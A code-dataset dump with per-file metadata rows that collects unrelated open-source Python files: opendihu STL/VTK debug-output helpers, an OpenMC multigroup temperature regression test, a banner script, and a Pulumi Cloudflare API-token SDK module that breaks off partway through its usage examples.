| 34.097015 | 113 | 0.675859 | 717 | 4,569 | 4.225941 | 0.103208 | 0.059406 | 0.053465 | 0.039604 | 0.942904 | 0.935314 | 0.935314 | 0.935314 | 0.923762 | 0.89802 | 0 | 0.034358 | 0.152769 | 4,569 | 133 | 114 | 34.353383 | 0.748385 | 0.181878 | 0 | 0.762376 | 0 | 0 | 0.018519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118812 | false | 0 | 0.039604 | 0 | 0.217822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6b803dfb91cfaa5846c1411a359bf042fae556ee | 16,805 | py | Python | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 17 | 2018-11-25T19:29:34.000Z | 2021-09-20T04:46:22.000Z | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 1 | 2020-11-12T15:15:58.000Z | 2020-12-29T15:29:24.000Z | scripts/geometry_manipulation/stl_debug_output.py | maierbn/opendihu | 577650e2f6b36a7306766b0f4176f8124458cbf0 | [
"MIT"
] | 4 | 2018-10-17T12:18:10.000Z | 2021-05-28T13:24:20.000Z | #!/usr/bin/env ../../../../../dependencies/python/install/bin/python3
# -*- coding: utf-8 -*-
#
# The functions in this script will be called from the C++ code from parallel_fiber_estimation. They write some debugging information to files.
import os
import numpy as np
import stl
from stl import mesh
import vtk
import stl_create_rings
def output_points(filename, rankNo, level, points, size):
with_vtk = False
triangles = []
#print("> output_points(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
if with_vtk:
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
except:
pass
factor = 1.0
for p in points:
point = np.array([p[0], p[1], p[2]])
# add point to vtk data set
if with_vtk:
vtk_points.InsertNextPoint(p[0],p[1],p[2])
# add triangle to stl dataset
stl_create_rings.create_point_marker(point, triangles, size*factor)
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if level != -1:
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
else:
outfile = "{}.stl".format(filename)
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
if with_vtk:
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
print("> output_points(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_streamline(filename, rankNo, level, points, size):
triangles = []
print("> output_streamline(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except:
pass
factor = 1.0
line_no = 0
previous_point = None
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is not None:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no + 0)
vtk_line.GetPointIds().SetId(1, 2*line_no + 1)
vtk_lines.InsertNextCell(vtk_line)
line_no += 1
except:
print("Error in creating vtk dataset in output_streamline({})".format(filename))
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
print("> output_streamline(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_streamlines(filename, rankNo, level, streamlines, size):
triangles = []
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except:
pass
factor = 1.0
line_no = 0
for points in streamlines:
previous_point = None
#print("output_streamlines, streamline: {}".format(points))
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is not None:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no + 0)
vtk_line.GetPointIds().SetId(1, 2*line_no + 1)
vtk_lines.InsertNextCell(vtk_line)
except:
print("Error in creating vtk dataset in output_streamlines({})".format(filename))
line_no += 1
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
def output_rings(filename, rankNo, level, rings, size):
triangles = []
print("> output_rings(filename={}, rankNo={}, level={}, n rings: {}, size={})".format(filename, rankNo, level, len(rings), size))
# setup points and vertices
try:
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except Exception as error:
print("Error in setup for output_rings {}: {}".format(filename, error))
factor = 1.0
line_no = 0
for points in rings:
previous_point = None
first_point = None
for p in points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is None:
first_point = point
else:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no+0)
vtk_line.GetPointIds().SetId(1, 2*line_no+1)
vtk_lines.InsertNextCell(vtk_line)
except Exception as error:
print("Error in creating vtk dataset in output_rings({}): {}".format(filename, error))
line_no += 1
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
# close loop (not for boundary points on faces)
if previous_point is not None:
triangles.append([previous_point, first_point, 0.5*(previous_point+first_point)])
try:
vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
vtk_points.InsertNextPoint(first_point[0], first_point[1], first_point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, 2*line_no+0)
vtk_line.GetPointIds().SetId(1, 2*line_no+1)
vtk_lines.InsertNextCell(vtk_line)
except Exception as error:
print("Error in creating vtk dataset in output_rings({}): {}".format(filename, error))
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
print("output_rings({}, {}, {}, ...)".format(filename, rankNo, level))
if not os.path.exists("out/level_{}".format(level)):
print("path does not exist")
os.makedirs("out/level_{}".format(level),0o755)
print("path created")
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except Exception as error:
print("writing vtp file {} failed: {}".format(filename, error))
  print("> output_rings(filename={}, rankNo={}, level={}, n rings: {}, size={}) done".format(filename, rankNo, level, len(rings), size))
def output_boundary_points(filename, rankNo, level, points, size):
triangles = []
print("> output_boundary_points(filename={}, rankNo={}, level={}, n points: {}, size={})".format(filename, rankNo, level, len(points), size))
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_lines = vtk.vtkCellArray()
except Exception as error:
print("Error in setup for output_boundary_points, {}: {}".format(filename, error))
# data structure:
# std::array<std::vector<std::vector<Vec3>>,4>
# list [<face0>, <face1>, <face2>, <face3>]
# <face> = [<level0>, <level1>, ...]
# <level> = [<point0>, <point1>, ...]
factor = 1.0
line_no = 0
for face_points in points:
for zlevel_points in face_points:
previous_point = None
first_point = None
for p in zlevel_points:
point = np.array([p[0], p[1], p[2]])
if np.linalg.norm(point) < 1e-3:
continue
if previous_point is None:
first_point = point
else:
triangles.append([previous_point, point, 0.5*(previous_point+point)])
try:
id1 = vtk_points.InsertNextPoint(previous_point[0], previous_point[1], previous_point[2])
id2 = vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_line = vtk.vtkLine()
vtk_line.GetPointIds().SetId(0, id1)
vtk_line.GetPointIds().SetId(1, id2)
vtk_lines.InsertNextCell(vtk_line)
line_no += 1
except Exception as error:
print("Error in creating vtk dataset in output_boundary_points({}): {}".format(filename, error))
previous_point = point
stl_create_rings.create_point_marker(point, triangles, size*factor)
#factor *= 1.1
#if factor > 3:
# factor = 3.0
# close loop (not for boundary points on faces)
#if previous_point is not None:
# triangles.append([previous_point, first_point, 0.5*(previous_point+first_point)])
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#for j in range(3):
#print("set (",i,",",j,")=",f[j]," (=",stl_mesh.vectors[i][j],")"
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetLines(vtk_lines)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except Exception as error:
print("writing vtp file {} failed: {}".format(filename, error))
print("> output_boundary_points(filename={}, rankNo={}, level={}, n points: {}, size={}) done".format(filename, rankNo, level, len(points), size))
def output_triangles(filename, triangles):
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
outfile = "out/{}.stl".format(filename)
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
def output_ghost_elements(filename, rankNo, level, point_values, n_elements, size):
triangles = []
try:
# setup points and vertices
vtk_points = vtk.vtkPoints()
vtk_boxes = vtk.vtkCellArray()
except:
pass
  n_points = len(point_values) // 3
n_nodes = [n_elements[0]+1, n_elements[1]+1, n_elements[2]+1]
#print("output_ghost_elements, filename {}, n_elements: {}, n points: {}, n_nodes: {}, n_points: {}".format(filename, n_elements, len(point_values), n_nodes, n_points))
#print("point_values: {}".format(point_values))
#print("n_points: {}".format(n_points))
#print("n_elements: {}".format(n_elements))
factor = 1.0
box_no = 0
for z in range(n_elements[2]):
for y in range(n_elements[1]):
for x in range(n_elements[0]):
p = list()
for k in range(2):
for j in range(2):
for i in range(2):
index = (z+k) * n_nodes[0]*n_nodes[1] + (y+j) * n_nodes[0] + (x+i)
#print("index: {}".format(index))
p0 = np.array([point_values[index], point_values[n_points+index], point_values[2*n_points+index]])
p.append(p0)
#print("x: {}, y: {}, z: {}, points: {}".format(x,y,z,p))
triangles += [
[p[0],p[3],p[1]],[p[0],p[2],p[3]], # bottom
[p[4],p[5],p[7]],[p[4],p[7],p[6]], # top
[p[0],p[1],p[5]],[p[0],p[5],p[4]], # front
[p[2],p[7],p[3]],[p[2],p[6],p[7]], # back
[p[2],p[0],p[4]],[p[2],p[4],p[6]], # left
[p[1],p[3],p[7]],[p[1],p[7],p[5]] # right
]
try:
for i in [0,1,3,2,4,5,7,6]:
point = p[i]
vtk_points.InsertNextPoint(point[0], point[1], point[2])
vtk_box = vtk.vtkLine()
for i in range(8):
vtk_box.GetPointIds().SetId(i, 8*box_no + i)
vtk_boxes.InsertNextCell(8)
except:
print("Error in creating vtk dataset in output_ghost_elements({})".format(filename))
box_no += 1
#---------------------------------------
# Create the mesh
out_mesh = mesh.Mesh(np.zeros(len(triangles), dtype=mesh.Mesh.dtype))
for i, f in enumerate(triangles):
out_mesh.vectors[i] = f
#out_mesh.update_normals()
if not os.path.exists("out/level_{}".format(level)):
os.makedirs("out/level_{}".format(level),0o755)
outfile = "out/level_{}/{}.{}.{}.stl".format(level, filename[0:2], rankNo, filename[2:])
#out_mesh.save(outfile, mode=stl.Mode.ASCII)
out_mesh.save(outfile)
print("saved {} triangles to \"{}\"".format(len(triangles),outfile))
try:
polydata = vtk.vtkPolyData()
polydata.SetPoints(vtk_points)
polydata.SetPolys(vtk_boxes)
polydata.Modified()
writer = vtk.vtkXMLPolyDataWriter()
writer.SetFileName(outfile+".vtp")
writer.SetInputData(polydata)
writer.Write()
except:
print("writing vtp file {} failed".format(filename))
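# The face triangulation above can be checked in isolation: for a unit cube the
# twelve triangles must cover all six faces. A small sketch (hypothetical
# stand-alone check, same connectivity and corner ordering as the loops above):

```python
import numpy as np

# Corner ordering matches the (k, j, i) loops: index = 4*k + 2*j + i,
# with coordinates x=i, y=j, z=k of a unit cube.
p = [np.array([float(i), float(j), float(k)])
     for k in range(2) for j in range(2) for i in range(2)]

triangles = [
    [p[0], p[3], p[1]], [p[0], p[2], p[3]],  # bottom
    [p[4], p[5], p[7]], [p[4], p[7], p[6]],  # top
    [p[0], p[1], p[5]], [p[0], p[5], p[4]],  # front
    [p[2], p[7], p[3]], [p[2], p[6], p[7]],  # back
    [p[2], p[0], p[4]], [p[2], p[4], p[6]],  # left
    [p[1], p[3], p[7]], [p[1], p[7], p[5]],  # right
]

def area(tri):
    # half the cross-product norm gives the triangle area
    a, b, c = tri
    return 0.5 * np.linalg.norm(np.cross(b - a, c - a))

total = sum(area(t) for t in triangles)
print(len(triangles), total)  # 12 triangles, total surface area 6.0
```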

# ============================================================
# File: tests/regression_tests/mg_temperature/test.py
# Repo: Hit-Weixg/openmc (MIT)
# ============================================================
import os
from tests.regression_tests.mg_temperature.build_2g import *
from tests.testing_harness import *
import shutil


class MgTemperatureTestHarness(TestHarness):
    def execute_test(self):
        """Run OpenMC with the appropriate arguments and check the outputs."""
        base_dir = os.getcwd()
        overall_results = []
        macro_xs = create_openmc_2mg_libs(names)
        types = ('micro', 'micro',
                 'micro', 'micro',
                 'micro',
                 'macro', 'macro',
                 'macro', 'macro',
                 'macro')
        temperatures = (300., 600., 900.,
                        520., 600.,
                        300., 600., 900.,
                        520., 600)
        methods = 2 * (3 * ('nearest',) + 2 * ('interpolation',))
        analyt_interp = 10 * [None]
        analyt_interp[3] = (600. - 520.) / 300.
        analyt_interp[8] = (600. - 520.) / 300.
        try:
            if os.path.isdir("./temp"):
                shutil.rmtree("./temp")
            os.mkdir("temp")
            os.chdir(os.path.join(base_dir, "temp"))
            for cs, t, m, ai in zip(types, temperatures, methods, analyt_interp):
                if cs == 'macro':
                    build_inf_model(['macro'], '../macro_2g.h5', t, m)
                else:
                    build_inf_model(names, '../micro_2g.h5', t, m)
                if not ai:
                    kanalyt = analytical_solution_2g_therm(macro_xs[t])
                else:
                    kanalyt = analytical_solution_2g_therm(macro_xs[300],
                                                           macro_xs[600], ai)
                self._run_openmc()
                self._test_output_created()
                string = "{}, method: {}, t: {}, {}kanalyt\n{:12.6E}\n"
                results = string.format(cs, m, t, self._get_results(), kanalyt)
                overall_results.append(results)
            os.chdir(base_dir)
            self._write_results("".join(overall_results))
            self._compare_results()
        finally:
            os.chdir(base_dir)
            if os.path.isdir("./temp"):
                shutil.rmtree("./temp")
            self._cleanup()
            for f in ['micro_2g.h5', 'macro_2g.h5']:
                if os.path.exists(f):
                    os.remove(f)

    def update_results(self):
        """Update the results_true using the current version of OpenMC."""
        base_dir = os.getcwd()
        overall_results = []
        macro_xs = create_openmc_2mg_libs(names)
        types = ('micro', 'micro',
                 'micro', 'micro',
                 'micro',
                 'macro', 'macro',
                 'macro', 'macro',
                 'macro')
        temperatures = (300., 600., 900.,
                        520., 600.,
                        300., 600., 900.,
                        520., 600)
        methods = 2 * (3 * ('nearest',) + 2 * ('interpolation',))
        analyt_interp = 10 * [None]
        analyt_interp[3] = (600. - 520.) / 300.
        analyt_interp[8] = (600. - 520.) / 300.
        try:
            if os.path.isdir("./temp"):
                shutil.rmtree("./temp")
            os.mkdir("temp")
            os.chdir(os.path.join(base_dir, "temp"))
            for cs, t, m, ai in zip(types, temperatures, methods, analyt_interp):
                if cs == 'macro':
                    build_inf_model(['macro'], '../macro_2g.h5', t, m)
                else:
                    build_inf_model(names, '../micro_2g.h5', t, m)
                if not ai:
                    kanalyt = analytical_solution_2g_therm(macro_xs[t])
                else:
                    kanalyt = analytical_solution_2g_therm(macro_xs[300],
                                                           macro_xs[600], ai)
                self._run_openmc()
                self._test_output_created()
                string = "{}, method: {}, t: {}, {}kanalyt\n{:12.6E}\n"
                results = string.format(cs, m, t, self._get_results(), kanalyt)
                overall_results.append(results)
            os.chdir(base_dir)
            self._write_results("".join(overall_results))
            self._compare_results()
        finally:
            os.chdir(base_dir)
            shutil.copyfile("results_test.dat", "results_true.dat")
            if os.path.isdir("./temp"):
                shutil.rmtree("./temp")
            self._cleanup()
            for f in ['micro_2g.h5', 'macro_2g.h5']:
                if os.path.exists(f):
                    os.remove(f)


def test_mg_temperature():
    harness = MgTemperatureTestHarness('statepoint.200.h5')
    harness.main()
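# The analyt_interp entries above are linear-interpolation fractions between the
# 300 K and 600 K libraries. A sketch of that arithmetic (hypothetical helper,
# not part of the harness; the convention that the fraction weights the
# lower-temperature data is an assumption consistent with (600 - 520) / 300):

```python
def interp_fraction(t, t_low=300.0, t_high=600.0):
    # Fraction as used by analyt_interp: (t_high - t) / (t_high - t_low)
    return (t_high - t) / (t_high - t_low)

def interp(t, v_low, v_high):
    # Assumed convention: f weights the low-temperature value,
    # (1 - f) the high-temperature one; exact at both endpoints.
    f = interp_fraction(t)
    return f * v_low + (1.0 - f) * v_high

print(interp_fraction(520.0))  # (600 - 520) / 300 = 0.2666...
```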

# ============================================================
# File: PolyscopeSDK/subpackages/__init__.py
# Repo: AzmHmd/WSI_Data_Preparation (MIT)
# ============================================================
from subpackages import txt_to_df
from subpackages import cws_tile_annotations_to_wsi_polyscope
from subpackages import cws_tile_annotations_to_tile_polyscope
from subpackages import polyscope_dots_to_labels

# ============================================================
# File: banner.py
# Repo: maxine-mrx/helpcomunity (MIT)
# ============================================================
#!/usr/bin/env python3
#############################################
# Org: help comunity #
# Authors : DB and M4x1n3 #
#############################################
from colors import white,blue,green,red
def banning(msg):
    print('''{}
{}## # ### ###
{}# # # # {} ### #
{}# # # ## # # # # {} # # ## ## # # # # # ### #### # #
{}# ## # # # # ## # # {}# # # # # # # # ## # # # # #
{}# # # #### # # # # {}# # # # # # # # # # # # # #
{}# # # # # # # # {}# # # # # # # # # # # # ##
{}# # # # # # # # {} # # # # # # # ## # # # # ##
{}# # # ### # ### # {} ### ## # # # # # # # # ## # {} [help]{}comunity
{}### # ### {} V1.0 {} # {} Coded by {}
{} # {} # '''.format(blue,blue,blue,white,blue,white,blue,white,blue,white,
blue,white,blue,white,blue,white,white,blue,blue,red,white,green,msg,blue,white))
if __name__ == '__main__':
    pass

# ============================================================
# File: sdk/python/pulumi_cloudflare/api_token.py
# Repo: pulumi/pulumi-cloudflare (ECL-2.0 / Apache-2.0)
# ============================================================
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ApiTokenArgs', 'ApiToken']
@pulumi.input_type
class ApiTokenArgs:
    def __init__(__self__, *,
                 name: pulumi.Input[str],
                 policies: pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]],
                 condition: Optional[pulumi.Input['ApiTokenConditionArgs']] = None):
        """
        The set of arguments for constructing a ApiToken resource.
        :param pulumi.Input[str] name: Name of the APIToken.
        :param pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]] policies: Permissions policy. Multiple policy blocks can be defined.
               See the definition below.
        :param pulumi.Input['ApiTokenConditionArgs'] condition: Condition block. See the definition below.
        """
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "policies", policies)
        if condition is not None:
            pulumi.set(__self__, "condition", condition)

    @property
    @pulumi.getter
    def name(self) -> pulumi.Input[str]:
        """
        Name of the APIToken.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: pulumi.Input[str]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def policies(self) -> pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]:
        """
        Permissions policy. Multiple policy blocks can be defined.
        See the definition below.
        """
        return pulumi.get(self, "policies")

    @policies.setter
    def policies(self, value: pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]):
        pulumi.set(self, "policies", value)

    @property
    @pulumi.getter
    def condition(self) -> Optional[pulumi.Input['ApiTokenConditionArgs']]:
        """
        Condition block. See the definition below.
        """
        return pulumi.get(self, "condition")

    @condition.setter
    def condition(self, value: Optional[pulumi.Input['ApiTokenConditionArgs']]):
        pulumi.set(self, "condition", value)

@pulumi.input_type
class _ApiTokenState:
    def __init__(__self__, *,
                 condition: Optional[pulumi.Input['ApiTokenConditionArgs']] = None,
                 issued_on: Optional[pulumi.Input[str]] = None,
                 modified_on: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 policies: Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]] = None,
                 status: Optional[pulumi.Input[str]] = None,
                 value: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ApiToken resources.
        :param pulumi.Input['ApiTokenConditionArgs'] condition: Condition block. See the definition below.
        :param pulumi.Input[str] issued_on: The RFC3339 timestamp of when the API Token was issued.
        :param pulumi.Input[str] modified_on: The RFC3339 timestamp of when the API Token was last modified.
        :param pulumi.Input[str] name: Name of the APIToken.
        :param pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]] policies: Permissions policy. Multiple policy blocks can be defined.
               See the definition below.
        :param pulumi.Input[str] value: The value of the API Token.
        """
        if condition is not None:
            pulumi.set(__self__, "condition", condition)
        if issued_on is not None:
            pulumi.set(__self__, "issued_on", issued_on)
        if modified_on is not None:
            pulumi.set(__self__, "modified_on", modified_on)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if policies is not None:
            pulumi.set(__self__, "policies", policies)
        if status is not None:
            pulumi.set(__self__, "status", status)
        if value is not None:
            pulumi.set(__self__, "value", value)

    @property
    @pulumi.getter
    def condition(self) -> Optional[pulumi.Input['ApiTokenConditionArgs']]:
        """
        Condition block. See the definition below.
        """
        return pulumi.get(self, "condition")

    @condition.setter
    def condition(self, value: Optional[pulumi.Input['ApiTokenConditionArgs']]):
        pulumi.set(self, "condition", value)

    @property
    @pulumi.getter(name="issuedOn")
    def issued_on(self) -> Optional[pulumi.Input[str]]:
        """
        The RFC3339 timestamp of when the API Token was issued.
        """
        return pulumi.get(self, "issued_on")

    @issued_on.setter
    def issued_on(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "issued_on", value)

    @property
    @pulumi.getter(name="modifiedOn")
    def modified_on(self) -> Optional[pulumi.Input[str]]:
        """
        The RFC3339 timestamp of when the API Token was last modified.
        """
        return pulumi.get(self, "modified_on")

    @modified_on.setter
    def modified_on(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "modified_on", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Name of the APIToken.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]]:
        """
        Permissions policy. Multiple policy blocks can be defined.
        See the definition below.
        """
        return pulumi.get(self, "policies")

    @policies.setter
    def policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApiTokenPolicyArgs']]]]):
        pulumi.set(self, "policies", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)

    @property
    @pulumi.getter
    def value(self) -> Optional[pulumi.Input[str]]:
        """
        The value of the API Token.
        """
        return pulumi.get(self, "value")

    @value.setter
    def value(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "value", value)

class ApiToken(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 condition: Optional[pulumi.Input[pulumi.InputType['ApiTokenConditionArgs']]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApiTokenPolicyArgs']]]]] = None,
                 __props__=None):
        """
        Provides a resource which manages Cloudflare API tokens.

        Read more about permission groups and their applicable scopes in
        [the official documentation](https://developers.cloudflare.com/api/tokens/create/permissions).

        ## Example Usage
        ### User Permissions

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to create new tokens.
        # Can only be used from specific ip range.
        api_token_create = cloudflare.ApiToken("apiTokenCreate",
            name="api_token_create",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["API Tokens Write"]],
                resources={
                    f"com.cloudflare.api.user.{var['user_id']}": "*",
                },
            )],
            condition=cloudflare.ApiTokenConditionArgs(
                request_ip=cloudflare.ApiTokenConditionRequestIpArgs(
                    ins=["192.0.2.1/32"],
                    not_ins=["198.51.100.1/32"],
                ),
            ))
        ```
        ### Account permissions

        ```python
        import pulumi
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to read audit logs from all accounts.
        logs_account_all = cloudflare.ApiToken("logsAccountAll",
            name="logs_account_all",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["Access: Audit Logs Read"]],
                resources={
                    "com.cloudflare.api.account.*": "*",
                },
            )])
        # Token allowed to read audit logs from specific account.
        logs_account = cloudflare.ApiToken("logsAccount",
            name="logs_account",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[all.permissions["Access: Audit Logs Read"]],
                resources={
                    f"com.cloudflare.api.account.{var['account_id']}": "*",
                },
            )])
        ```
        ### Zone Permissions

        ```python
        import pulumi
        import json
        import pulumi_cloudflare as cloudflare

        all = cloudflare.get_api_token_permission_groups()
        # Token allowed to edit DNS entries and TLS certs for specific zone.
        dns_tls_edit = cloudflare.ApiToken("dnsTlsEdit",
            name="dns_tls_edit",
            policies=[cloudflare.ApiTokenPolicyArgs(
                permission_groups=[
                    all.permissions["DNS Write"],
                    all.permissions["SSL and Certificates Write"],
                ],
                resources={
                    f"com.cloudflare.api.account.zone.{var['zone_id']}": "*",
                },
            )])
        # Token allowed to edit DNS entries for all zones except one.
        dns_tls_edit_all_except_one = cloudflare.ApiToken("dnsTlsEditAllExceptOne",
